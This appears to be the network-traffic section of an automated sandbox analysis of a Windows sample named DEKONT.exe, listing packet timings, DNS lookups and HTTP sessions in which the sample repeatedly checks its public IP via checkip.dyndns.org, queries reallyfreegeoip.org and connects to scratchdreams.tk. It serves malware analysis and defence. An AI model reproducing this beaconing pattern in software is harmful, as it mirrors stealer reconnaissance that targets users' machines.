                                                            Apr 24, 2024 10:12:08.839463949 CEST8049712193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:08.839543104 CEST4971280192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:09.128787994 CEST8049715193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:09.919146061 CEST8049715193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:09.920820951 CEST49716443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:09.920908928 CEST44349716104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:09.920999050 CEST49716443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:09.921358109 CEST49716443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:09.921392918 CEST44349716104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:09.964812040 CEST4971580192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:10.252162933 CEST44349716104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:10.253998041 CEST49716443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:10.254075050 CEST44349716104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:10.628529072 CEST44349716104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:10.628621101 CEST44349716104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:10.628698111 CEST49716443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:10.629390955 CEST49716443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:10.633388042 CEST4971580192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:10.634345055 CEST4971780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:10.936949968 CEST8049715193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:10.937148094 CEST4971580192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:10.942636967 CEST8049717193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:10.942722082 CEST4971780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:10.942965984 CEST4971780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:11.250283957 CEST8049717193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:11.251729012 CEST8049717193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:11.253257036 CEST49718443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:11.253292084 CEST44349718104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:11.253356934 CEST49718443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:11.253659964 CEST49718443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:11.253673077 CEST44349718104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:11.292905092 CEST4971780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:11.580502987 CEST44349718104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:11.589420080 CEST49718443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:11.589452982 CEST44349718104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:11.955933094 CEST44349718104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:11.956047058 CEST44349718104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:11.956365108 CEST49718443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:11.956937075 CEST49718443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:11.960973024 CEST4971780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:11.962287903 CEST4971980192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:12.268515110 CEST8049717193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:12.268644094 CEST4971780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:12.269782066 CEST8049719193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:12.269893885 CEST4971980192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:12.270056009 CEST4971980192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:12.578660965 CEST8049719193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:12.676800966 CEST8049719193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:12.678572893 CEST49720443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:12.678621054 CEST44349720104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:12.678711891 CEST49720443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:12.679054976 CEST49720443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:12.679078102 CEST44349720104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:12.730340958 CEST4971980192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:13.009645939 CEST44349720104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:13.011406898 CEST49720443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:13.011436939 CEST44349720104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:13.384921074 CEST44349720104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:13.385071993 CEST44349720104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:13.385169029 CEST49720443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:13.385884047 CEST49720443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:13.390002966 CEST4971980192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:13.391237974 CEST4972180192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:13.695853949 CEST8049721193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:13.695960999 CEST4972180192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:13.696244001 CEST4972180192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:13.719337940 CEST8049719193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:13.719407082 CEST4971980192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:13.999903917 CEST8049721193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:14.082504034 CEST8049721193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:14.084181070 CEST49722443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:14.084222078 CEST44349722104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:14.084319115 CEST49722443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:14.084602118 CEST49722443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:14.084616899 CEST44349722104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:14.136605024 CEST4972180192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:14.413245916 CEST44349722104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:14.415039062 CEST49722443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:14.415060043 CEST44349722104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:14.788444042 CEST44349722104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:14.789522886 CEST44349722104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:14.789587021 CEST49722443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:14.790112019 CEST49722443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:14.795697927 CEST4972180192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:14.796803951 CEST4972380192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:15.101866007 CEST8049721193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:15.102413893 CEST4972180192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:15.102910995 CEST8049723193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:15.103001118 CEST4972380192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:15.103277922 CEST4972380192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:15.408463001 CEST8049723193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:15.409518957 CEST8049723193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:15.411128998 CEST49724443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:15.411175013 CEST44349724104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:15.411235094 CEST49724443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:15.411632061 CEST49724443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:15.411653996 CEST44349724104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:15.464826107 CEST4972380192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:15.748035908 CEST44349724104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:15.749857903 CEST49724443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:15.749939919 CEST44349724104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:16.120410919 CEST44349724104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:16.120564938 CEST44349724104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:16.120630980 CEST49724443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:16.127154112 CEST49724443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:16.139414072 CEST4972380192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:16.448553085 CEST8049723193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:16.448714972 CEST4972380192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:17.830497980 CEST49725443192.168.2.8104.21.27.85
                                                            Apr 24, 2024 10:12:17.830545902 CEST44349725104.21.27.85192.168.2.8
                                                            Apr 24, 2024 10:12:17.830607891 CEST49725443192.168.2.8104.21.27.85
                                                            Apr 24, 2024 10:12:17.831974983 CEST49725443192.168.2.8104.21.27.85
                                                            Apr 24, 2024 10:12:17.831995964 CEST44349725104.21.27.85192.168.2.8
                                                            Apr 24, 2024 10:12:18.164330006 CEST44349725104.21.27.85192.168.2.8
                                                            Apr 24, 2024 10:12:18.164452076 CEST49725443192.168.2.8104.21.27.85
                                                            Apr 24, 2024 10:12:18.166623116 CEST49725443192.168.2.8104.21.27.85
                                                            Apr 24, 2024 10:12:18.166645050 CEST44349725104.21.27.85192.168.2.8
                                                            Apr 24, 2024 10:12:18.166943073 CEST44349725104.21.27.85192.168.2.8
                                                            Apr 24, 2024 10:12:18.168804884 CEST49725443192.168.2.8104.21.27.85
                                                            Apr 24, 2024 10:12:18.216120958 CEST44349725104.21.27.85192.168.2.8
                                                            Apr 24, 2024 10:12:53.448645115 CEST44349725104.21.27.85192.168.2.8
                                                            Apr 24, 2024 10:12:53.448808908 CEST44349725104.21.27.85192.168.2.8
                                                            Apr 24, 2024 10:12:53.448911905 CEST49725443192.168.2.8104.21.27.85
                                                            Apr 24, 2024 10:12:53.458935022 CEST49725443192.168.2.8104.21.27.85
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 24, 2024 10:12:03.158843040 CEST4945453192.168.2.81.1.1.1
                                                            Apr 24, 2024 10:12:03.312304974 CEST53494541.1.1.1192.168.2.8
                                                            Apr 24, 2024 10:12:04.925591946 CEST5519353192.168.2.81.1.1.1
                                                            Apr 24, 2024 10:12:05.176920891 CEST53551931.1.1.1192.168.2.8
                                                            Apr 24, 2024 10:12:16.139307976 CEST5833653192.168.2.81.1.1.1
                                                            Apr 24, 2024 10:12:17.604257107 CEST5833653192.168.2.81.1.1.1
                                                            Apr 24, 2024 10:12:17.819188118 CEST53583361.1.1.1192.168.2.8
                                                            Apr 24, 2024 10:12:17.819236994 CEST53583361.1.1.1192.168.2.8
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Apr 24, 2024 10:12:03.158843040 CEST192.168.2.81.1.1.10x32bcStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:04.925591946 CEST192.168.2.81.1.1.10xd724Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:16.139307976 CEST192.168.2.81.1.1.10x13eeStandard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:17.604257107 CEST192.168.2.81.1.1.10x13eeStandard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Apr 24, 2024 10:12:03.312304974 CEST1.1.1.1192.168.2.80x32bcNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            Apr 24, 2024 10:12:03.312304974 CEST1.1.1.1192.168.2.80x32bcNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:03.312304974 CEST1.1.1.1192.168.2.80x32bcNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:03.312304974 CEST1.1.1.1192.168.2.80x32bcNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:03.312304974 CEST1.1.1.1192.168.2.80x32bcNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:03.312304974 CEST1.1.1.1192.168.2.80x32bcNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:05.176920891 CEST1.1.1.1192.168.2.80xd724No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:05.176920891 CEST1.1.1.1192.168.2.80xd724No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:17.819188118 CEST1.1.1.1192.168.2.80x13eeNo error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:17.819188118 CEST1.1.1.1192.168.2.80x13eeNo error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:17.819236994 CEST1.1.1.1192.168.2.80x13eeNo error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                            Apr 24, 2024 10:12:17.819236994 CEST1.1.1.1192.168.2.80x13eeNo error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                            • reallyfreegeoip.org
                                                            • scratchdreams.tk
                                                            • checkip.dyndns.org
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849707193.122.6.168807564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 24, 2024 10:12:03.624500990 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Apr 24, 2024 10:12:04.560245991 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 0789c963ee3212b49ed8fc94342d2e31
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>
                                                            Apr 24, 2024 10:12:04.571971893 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Apr 24, 2024 10:12:04.876972914 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 753284cc504c920348533eaaed73497d
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>
                                                            Apr 24, 2024 10:12:05.906738997 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Apr 24, 2024 10:12:06.250719070 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:06 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: af4f5d487a7512b77fedaadf957af114
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849712193.122.6.168807564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 24, 2024 10:12:07.288696051 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Apr 24, 2024 10:12:07.803047895 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:07 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 09594c32db6b4ab1023d6e07dcf1e4b7
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849715193.122.6.168807564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 24, 2024 10:12:08.823833942 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Apr 24, 2024 10:12:09.919146061 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: e0318c95c0275f56c1eee2db5e60bb38
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.849717193.122.6.168807564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 24, 2024 10:12:10.942965984 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Apr 24, 2024 10:12:11.251729012 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:11 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1b912b367de582f8085bef85682934ae
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.849719193.122.6.168807564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 24, 2024 10:12:12.270056009 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Apr 24, 2024 10:12:12.676800966 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 90390c58b7b48ab3c4d5e64b12dcd028
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.849721193.122.6.168807564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 24, 2024 10:12:13.696244001 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Apr 24, 2024 10:12:14.082504034 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 0a3b45e37446e3e39160719de357c276
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.849723193.122.6.168807564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 24, 2024 10:12:15.103277922 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Apr 24, 2024 10:12:15.409518957 CEST322INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 105
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 89634fd3524771b377b26b7f185bd2a7
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849709104.21.67.1524437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:05 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:12:05 UTC712INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:05 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 10977
                                                            Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIv%2BT6e02dS6LTiaA11JFmMQ%2B2OM904wiZGN6Kpcr9ZsS5E6gEqQH1UnN6%2BIuxQvz%2FWEArNoPNQDEnrcz2wqy0r%2FMFbFmpsP8oe9WjwHnI4xMEabUIak78h2I%2BCdpuaGlk9olOlP"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8794a0584e1e7bfb-LAX
                                                            alt-svc: h3=":443"; ma=86400
